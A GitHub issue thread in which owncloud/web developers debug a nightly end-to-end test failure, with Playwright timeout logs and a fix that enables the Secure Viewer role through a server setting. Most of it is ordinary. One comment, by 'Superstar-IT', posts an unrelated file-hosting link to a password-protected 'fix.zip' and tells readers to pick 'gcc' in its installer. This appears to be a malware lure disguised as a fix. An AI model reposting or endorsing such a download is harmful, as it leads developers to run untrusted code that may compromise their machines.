### ISSUE TITLE
E2E test nightly failure in `e2e-tests-app-provider` suite

### ISSUE THREAD

**Issue by SagarGi** [owncloud/web#11442]
### Description
We have a nightly failure on  `e2e-tests-app-provider` suite:
Build Link: https://drone.owncloud.com/owncloud/web/46897/14/14

```feature
Scenario: open office suite files with Collabora and onlyOffice (attempt 1, retried) # tests/e2e/cucumber/features/app-provider/urlJourneys.feature:10
   ✔ Before # tests/e2e/cucumber/environment/index.ts:44
   ✔ Given "Admin" creates following users using API # tests/e2e/cucumber/steps/api.ts:7
       | id    |
       | Alice |
   ✔ And "Alice" logs in # tests/e2e/cucumber/steps/ui/session.ts:45
   ✔ And "Alice" creates the following files into personal space using API # tests/e2e/cucumber/steps/api.ts:108
       | pathToFile       | content              |
       | OpenDocument.odt | OpenDocument Content |
   ✔ And "Alice" creates the following resources # tests/e2e/cucumber/steps/ui/resources.ts:19
       | resource           | type           | content                |
       | MicrosoftWord.docx | Microsoft Word | Microsoft Word Content |
   ✔ And for "Alice" file "MicrosoftWord.docx" should not be locked # tests/e2e/cucumber/steps/ui/resources.ts:832
   ✔ And "Alice" opens the "files" app # tests/e2e/cucumber/steps/ui/application.ts:15
   ✔ When "Alice" opens the file "OpenDocument.odt" of space "personal" in Collabora through the URL for desktop client # tests/e2e/cucumber/steps/ui/navigateByUrl.ts:31
   ✔ Then "Alice" should see the content "OpenDocument Content" in editor "Collabora" # tests/e2e/cucumber/steps/ui/public.ts:87
   ✔ When "Alice" opens the file "MicrosoftWord.docx" of space "personal" in OnlyOffice through the URL for desktop client # tests/e2e/cucumber/steps/ui/navigateByUrl.ts:31
   ✖ Then "Alice" should see the content "Microsoft Word Content" in editor "OnlyOffice" # tests/e2e/cucumber/steps/ui/public.ts:87
       locator.click: Timeout 30000ms exceeded.
       Call log:
         - waiting for frameLocator('[name="app-iframe"]').frameLocator('[name="frameEditor"]').locator('#id_viewer_overlay')
         -   locator resolved to <canvas width="931" height="486" class="block_elem" id="id_viewer_overlay"></canvas>
         - attempting click action
         -   waiting for element to be visible, enabled and stable
         -   element is visible, enabled and stable
         -   scrolling into view if needed
         -   done scrolling
         -   <div class="footer center">…</div> from <div id="window-view699" class="asc-window modal alert">…</div> subtree intercepts pointer events
         - retrying click action, attempt #1
         -   waiting for element to be visible, enabled and stable
         -   element is visible, enabled and stable
         -   scrolling into view if needed
         -   done scrolling
         -   <div class="footer center">…</div> from <div id="window-view699" class="asc-window modal alert">…</div> subtree intercepts pointer events
         - retrying click action, attempt #2
         -   waiting 20ms
         -   waiting for element to be visible, enabled and stable
         -   element is visible, enabled and stable
         -   scrolling into view if needed
         -   done scrolling
         -   <div class="footer center">…</div> from <div id="window-view699" class="asc-window modal alert">…</div> subtree intercepts pointer events
         - retrying click action, attempt #3
         -   waiting 100ms
         -   waiting for element to be visible, enabled and stable
         -   element is visible, enabled and stable
         -   scrolling into view if needed
         -   done scrolling
         -   <div class="footer center">…</div> from <div id="window-view699" class="asc-window modal alert">…</div> subtree intercepts pointer events
         - retrying click action, attempt #4
         -   waiting 100ms
         -   waiting for element to be visible, enabled and stable
         -   element is visible, enabled and stable
         -   scrolling into view if needed
         -   done scrolling
         -   <div class="footer center">…</div> from <div id="window-view699" class="asc-window modal alert">…</div> subtree intercepts pointer events
         - retrying click action, attempt #5
         -   waiting 500ms
         -   waiting for element to be visible, enabled and stable
         -   element is visible, enabled and stable
         -   scrolling into view if needed
         -   done scrolling
         -   <div class="footer center">…</div> from <div id="window-view699" class="asc-window modal alert notransform">…</div> subtree intercepts pointer events
         - retrying click action, attempt #6
         -   waiting 500ms
         -   waiting for element to be visible, enabled and stable
         -   element is visible, enabled and stable
         -   scrolling into view if needed
         -   done scrolling
         -   <div class="footer center">…</div> from <div id="window-view699" class="asc-window modal alert notransform">…</div> subtree intercepts pointer events
         - retrying click action, attempt #7
         -   waiting 500ms
         -   waiting for element to be visible, enabled and stable
         -   element is visible, enabled and stable
         -   scrolling into view if needed
         -   done scrolling
         -   <div class="footer center">…</div> from <div id="window-view699" class="asc-window modal alert notransform">…</div> subtree intercepts pointer events
         - retrying click action, attempt #8
         -   waiting 500ms
         -   waiting for element to be visible, enabled and stable
         -   element is visible, enabled and stable
         -   scrolling into view if needed
         -   done scrolling
         -   <div class="footer center">…</div> from <div id="window-view699" class="asc-window modal alert notransform">…</div> subtree intercepts pointer events
         - retrying click action, attempt #9
         -   waiting 500ms
         -   waiting for element to be visible, enabled and stable
         -   element is visible, enabled and stable
         -   scrolling into view if needed
         -   done scrolling
```

**Comment by saw-jan** [comment]
`Secure Viewer` role is disabled by default. PR: https://github.com/owncloud/ocis/pull/9727
We need this new env config in ocis server to enable all roles:
```
"GRAPH_AVAILABLE_ROLES": "b1e2218d-eef8-4d4c-b82d-0f1a1b48f3b5,a8d5fe5e-96e3-418d-825b-534dbdf22b99,fb6c3e19-e378-47e5-b277-9732f9de6e21,58c63c02-1d89-4572-916a-870abc5a1b7d,2d00ce52-1fc2-4dbc-8b95-a73b73395f5a,1c996275-f1c9-4e71-abdf-a42f6495e960,312c0871-5ef7-4b3a-85b6-0e4074c64049,aa97fe03-7980-45ac-9e50-b325749fd7e6"
```

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by anon-pradip** [comment]
I will take this task

**Comment by S-Panta** [comment]
https://github.com/owncloud/web/pull/11448 wasn't able to fix the nightly because it wasn't run in full-ci
 ```feature
And "Alice" shares the following resources using the sidebar panel
      │ resource           │ recipient │ type │ role              │
      │ secureDocument.odt │ Brian     │ user │ Can view (secure) │
      │ shared folder      │ Brian     │ user │ Can view (secure) │
    ✖ failed
      page.click: Timeout 30000ms exceeded.
      Call log:
        - waiting for locator('//span[contains(@class,"roles-select-role-item")]/span[text()="Can view (secure)"]')

          at Function.setCollaboratorRole (/var/www/owncloud/web/tests/e2e/support/objects/app-files/share/collaborator.ts:155:23)
          at async Function.inviteCollaborators (/var/www/owncloud/web/tests/e2e/support/objects/app-files/share/collaborator.ts:138:5)
          at async Object.createShare (/var/www/owncloud/web/tests/e2e/support/objects/app-files/share/actions.ts:93:3)
          at async Share.create (/var/www/owncloud/web/tests/e2e/support/objects/app-files/share/index.ts:16:5)
          at async World.<anonymous> (/var/www/owncloud/web/tests/e2e/cucumber/steps/ui/shares.ts:60:7)
```
Failure error log: https://drone.owncloud.com/owncloud/web/47002/14/14****
